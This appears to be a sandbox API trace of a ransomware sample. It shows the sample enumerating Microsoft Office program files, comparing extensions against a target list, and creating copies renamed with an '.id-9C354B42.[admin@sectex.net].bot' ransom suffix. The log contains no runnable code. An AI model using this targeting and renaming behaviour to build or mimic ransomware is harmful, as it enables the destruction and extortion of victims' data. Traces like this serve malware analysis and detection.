	[0159.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.251] lstrlenW (lpString=".dbf") returned 4
	[0159.251] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.251] lstrlenW (lpString=".1cd") returned 4
	[0159.251] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.251] lstrlenW (lpString=".jpg") returned 4
	[0159.251] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.251] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.251] lstrlenW (lpString="TRANSMGR.DLL") returned 12
	[0159.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\transmgr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.253] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=130944) returned 1
	[0159.253] CloseHandle (hObject=0x1b4) returned 1
	[0159.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\transmgr.dll")) returned 0x20
	[0159.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\transmgr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\transmgr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.253] lstrlenW (lpString=".doc") returned 4
	[0159.253] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.253] lstrlenW (lpString=".docx") returned 5
	[0159.253] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0159.253] lstrlenW (lpString=".pdf") returned 4
	[0159.253] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.253] lstrlenW (lpString=".xls") returned 4
	[0159.253] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.253] lstrlenW (lpString=".xlsx") returned 5
	[0159.253] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0159.253] lstrlenW (lpString=".ppt") returned 4
	[0159.253] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.254] lstrlenW (lpString=".zip") returned 4
	[0159.254] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.254] lstrlenW (lpString=".rar") returned 4
	[0159.254] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.254] lstrlenW (lpString=".bz2") returned 4
	[0159.254] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.254] lstrlenW (lpString=".7z") returned 3
	[0159.254] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.254] lstrlenW (lpString=".dbf") returned 4
	[0159.254] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.254] lstrlenW (lpString=".1cd") returned 4
	[0159.254] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.254] lstrlenW (lpString=".jpg") returned 4
	[0159.254] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.254] lstrlenW (lpString=".doc") returned 4
	[0159.254] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.254] lstrlenW (lpString=".docx") returned 5
	[0159.254] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0159.254] lstrlenW (lpString=".pdf") returned 4
	[0159.254] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.254] lstrlenW (lpString=".xls") returned 4
	[0159.254] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.254] lstrlenW (lpString=".xlsx") returned 5
	[0159.254] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0159.255] lstrlenW (lpString=".ppt") returned 4
	[0159.255] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.255] lstrlenW (lpString=".zip") returned 4
	[0159.255] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.255] lstrlenW (lpString=".rar") returned 4
	[0159.255] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.255] lstrlenW (lpString=".bz2") returned 4
	[0159.255] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.255] lstrlenW (lpString=".7z") returned 3
	[0159.255] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.255] lstrlenW (lpString=".dbf") returned 4
	[0159.255] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.255] lstrlenW (lpString=".1cd") returned 4
	[0159.255] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\TRANSMGR.DLL") returned 63
	[0159.255] lstrlenW (lpString=".jpg") returned 4
	[0159.255] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.255] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.255] lstrlenW (lpString="CSS7DATA0009.DLL") returned 16
	[0159.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\css7data0009.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.256] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=594352) returned 1
	[0159.256] CloseHandle (hObject=0x1b4) returned 1
	[0159.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\css7data0009.dll")) returned 0x20
	[0159.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\css7data0009.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\css7data0009.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.256] lstrlenW (lpString=".doc") returned 4
	[0159.256] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.256] lstrlenW (lpString=".docx") returned 5
	[0159.256] lstrcmpiW (lpString1=".docx", lpString2="9.DLL") returned -1
	[0159.256] lstrlenW (lpString=".pdf") returned 4
	[0159.257] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.257] lstrlenW (lpString=".xls") returned 4
	[0159.257] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.257] lstrlenW (lpString=".xlsx") returned 5
	[0159.257] lstrcmpiW (lpString1=".xlsx", lpString2="9.DLL") returned -1
	[0159.257] lstrlenW (lpString=".ppt") returned 4
	[0159.257] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.257] lstrlenW (lpString=".zip") returned 4
	[0159.257] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.257] lstrlenW (lpString=".rar") returned 4
	[0159.257] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.257] lstrlenW (lpString=".bz2") returned 4
	[0159.257] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.257] lstrlenW (lpString=".7z") returned 3
	[0159.257] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.257] lstrlenW (lpString=".dbf") returned 4
	[0159.257] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.257] lstrlenW (lpString=".1cd") returned 4
	[0159.257] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.257] lstrlenW (lpString=".jpg") returned 4
	[0159.257] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.257] lstrlenW (lpString=".doc") returned 4
	[0159.257] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.257] lstrlenW (lpString=".docx") returned 5
	[0159.258] lstrcmpiW (lpString1=".docx", lpString2="9.DLL") returned -1
	[0159.258] lstrlenW (lpString=".pdf") returned 4
	[0159.258] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.258] lstrlenW (lpString=".xls") returned 4
	[0159.258] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.258] lstrlenW (lpString=".xlsx") returned 5
	[0159.258] lstrcmpiW (lpString1=".xlsx", lpString2="9.DLL") returned -1
	[0159.258] lstrlenW (lpString=".ppt") returned 4
	[0159.258] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.258] lstrlenW (lpString=".zip") returned 4
	[0159.258] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.258] lstrlenW (lpString=".rar") returned 4
	[0159.258] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.258] lstrlenW (lpString=".bz2") returned 4
	[0159.258] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.258] lstrlenW (lpString=".7z") returned 3
	[0159.258] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.258] lstrlenW (lpString=".dbf") returned 4
	[0159.258] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.258] lstrlenW (lpString=".1cd") returned 4
	[0159.258] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA0009.DLL") returned 59
	[0159.258] lstrlenW (lpString=".jpg") returned 4
	[0159.258] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.259] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.259] lstrlenW (lpString="CSS7DATA000A.DLL") returned 16
	[0159.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\css7data000a.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.259] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=766384) returned 1
	[0159.259] CloseHandle (hObject=0x1b4) returned 1
	[0159.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\css7data000a.dll")) returned 0x20
	[0159.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\css7data000a.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\css7data000a.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.260] lstrlenW (lpString=".doc") returned 4
	[0159.260] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.260] lstrlenW (lpString=".docx") returned 5
	[0159.260] lstrcmpiW (lpString1=".docx", lpString2="A.DLL") returned -1
	[0159.260] lstrlenW (lpString=".pdf") returned 4
	[0159.260] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.260] lstrlenW (lpString=".xls") returned 4
	[0159.260] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.260] lstrlenW (lpString=".xlsx") returned 5
	[0159.260] lstrcmpiW (lpString1=".xlsx", lpString2="A.DLL") returned -1
	[0159.260] lstrlenW (lpString=".ppt") returned 4
	[0159.260] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.260] lstrlenW (lpString=".zip") returned 4
	[0159.260] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.260] lstrlenW (lpString=".rar") returned 4
	[0159.260] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.260] lstrlenW (lpString=".bz2") returned 4
	[0159.260] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.260] lstrlenW (lpString=".7z") returned 3
	[0159.260] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.260] lstrlenW (lpString=".dbf") returned 4
	[0159.260] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.260] lstrlenW (lpString=".1cd") returned 4
	[0159.260] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.260] lstrlenW (lpString=".jpg") returned 4
	[0159.260] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.261] lstrlenW (lpString=".doc") returned 4
	[0159.261] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.261] lstrlenW (lpString=".docx") returned 5
	[0159.261] lstrcmpiW (lpString1=".docx", lpString2="A.DLL") returned -1
	[0159.261] lstrlenW (lpString=".pdf") returned 4
	[0159.261] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.261] lstrlenW (lpString=".xls") returned 4
	[0159.261] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.261] lstrlenW (lpString=".xlsx") returned 5
	[0159.261] lstrcmpiW (lpString1=".xlsx", lpString2="A.DLL") returned -1
	[0159.261] lstrlenW (lpString=".ppt") returned 4
	[0159.261] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.261] lstrlenW (lpString=".zip") returned 4
	[0159.261] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.261] lstrlenW (lpString=".rar") returned 4
	[0159.261] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.261] lstrlenW (lpString=".bz2") returned 4
	[0159.261] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.261] lstrlenW (lpString=".7z") returned 3
	[0159.261] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.261] lstrlenW (lpString=".dbf") returned 4
	[0159.261] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.261] lstrlenW (lpString=".1cd") returned 4
	[0159.261] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000A.DLL") returned 59
	[0159.262] lstrlenW (lpString=".jpg") returned 4
	[0159.262] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.262] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.262] lstrlenW (lpString="CSS7DATA000C.DLL") returned 16
	[0159.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\css7data000c.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.262] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=766384) returned 1
	[0159.262] CloseHandle (hObject=0x1b4) returned 1
	[0159.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\css7data000c.dll")) returned 0x20
	[0159.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\css7data000c.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\css7data000c.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.263] lstrlenW (lpString=".doc") returned 4
	[0159.263] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.263] lstrlenW (lpString=".docx") returned 5
	[0159.263] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0159.263] lstrlenW (lpString=".pdf") returned 4
	[0159.263] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.263] lstrlenW (lpString=".xls") returned 4
	[0159.263] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.263] lstrlenW (lpString=".xlsx") returned 5
	[0159.263] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0159.263] lstrlenW (lpString=".ppt") returned 4
	[0159.263] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.263] lstrlenW (lpString=".zip") returned 4
	[0159.263] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.263] lstrlenW (lpString=".rar") returned 4
	[0159.263] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.263] lstrlenW (lpString=".bz2") returned 4
	[0159.263] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.263] lstrlenW (lpString=".7z") returned 3
	[0159.263] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.264] lstrlenW (lpString=".dbf") returned 4
	[0159.264] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.264] lstrlenW (lpString=".1cd") returned 4
	[0159.264] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.264] lstrlenW (lpString=".jpg") returned 4
	[0159.264] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.264] lstrlenW (lpString=".doc") returned 4
	[0159.264] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.264] lstrlenW (lpString=".docx") returned 5
	[0159.264] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0159.264] lstrlenW (lpString=".pdf") returned 4
	[0159.264] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.264] lstrlenW (lpString=".xls") returned 4
	[0159.264] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.264] lstrlenW (lpString=".xlsx") returned 5
	[0159.264] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0159.264] lstrlenW (lpString=".ppt") returned 4
	[0159.264] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.264] lstrlenW (lpString=".zip") returned 4
	[0159.264] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.264] lstrlenW (lpString=".rar") returned 4
	[0159.264] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.264] lstrlenW (lpString=".bz2") returned 4
	[0159.264] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.264] lstrlenW (lpString=".7z") returned 3
	[0159.264] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.265] lstrlenW (lpString=".dbf") returned 4
	[0159.265] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.265] lstrlenW (lpString=".1cd") returned 4
	[0159.265] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CSS7DATA000C.DLL") returned 59
	[0159.265] lstrlenW (lpString=".jpg") returned 4
	[0159.265] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.265] lstrcmpiW (lpString1=".propdesc", lpString2=".bot") returned 1
	[0159.265] lstrlenW (lpString="Custom.propdesc") returned 15
	[0159.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc" (normalized: "c:\\program files\\microsoft office\\office14\\custom.propdesc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.265] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1343) returned 1
	[0159.266] CloseHandle (hObject=0x1b4) returned 1
	[0159.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc" (normalized: "c:\\program files\\microsoft office\\office14\\custom.propdesc")) returned 0x20
	[0159.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\custom.propdesc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc" (normalized: "c:\\program files\\microsoft office\\office14\\custom.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.266] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.266] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\custom.propdesc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.267] GetLastError () returned 0x0
